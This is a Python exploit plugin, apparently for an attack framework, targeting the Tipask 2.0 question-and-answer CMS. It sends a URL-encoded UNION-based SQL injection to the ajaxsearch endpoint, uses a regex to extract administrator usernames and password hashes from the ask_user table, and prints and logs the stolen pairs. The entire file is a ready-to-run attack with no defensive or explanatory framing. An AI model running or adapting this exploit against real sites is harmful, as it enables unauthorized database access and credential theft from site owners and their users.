# -*- coding: utf-8 -*-
class mstplugin:
    infos = [
        ['Plugin','Tipask_2.0_SQLInject'],
        ['Author','Mr.x'],
        ['Update','2013/10/31'],
        ['QQ','414106785']
        ]
    opts  = [
        ['URL','localhost','Url'],
        ['PATH','/','Cms path'],
        ['PORT','80','port']
        ]
    def exploit(self):
        url = fuck.urlformate(URL,PORT,PATH)
        exp_name = url+"/?question/ajaxsearch/%27%20%55%4E%49%4F%4E%20%53%45%4C%45%43%54%20%31%2C%32%2C%33%2C%34%2C%35%2C%36%2C%37%2C%38%2C%63%6F%6E%63%61%74%28%75%73%65%72%6E%61%6D%65%2C%63%68%61%72%28%30%78%33%64%29%2C%70%61%73%73%77%6F%72%64%29%2C%31%30%2C%31%31%2C%31%32%2C%31%33%2C%31%34%2C%31%35%2C%31%36%2C%31%37%2C%31%38%2C%31%39%2C%32%30%2C%32%31%20%66%72%6F%6D%20%61%73%6B%5F%75%73%65%72%20%77%68%65%72%65%20%67%72%6F%75%70%69%64%3D%31%23"
        color.cprint("[*] Inject user..",YELLOW)
        ok  = fuck.urlget(exp_name)
        if ok.getcode() == 200:
            tmp=fuck.find("\w+=\w{32}",ok.read())
            if len(tmp)>0:
                color.cprint("[*] Exploit Successful !",GREEN)
                for x in tmp:
                    color.cprint('[*] '+x,GREEN)
                    fuck.writelog("Tipask_2.0_SQLInject",URL+"::"+x)
            else:
                color.cprint("[!] TARGET NO VULNERABLE !",RED)
        else:
            color.cprint("[!] EXPLOIT FALSE ! CODE:%s"%ok.getcode(),RED)
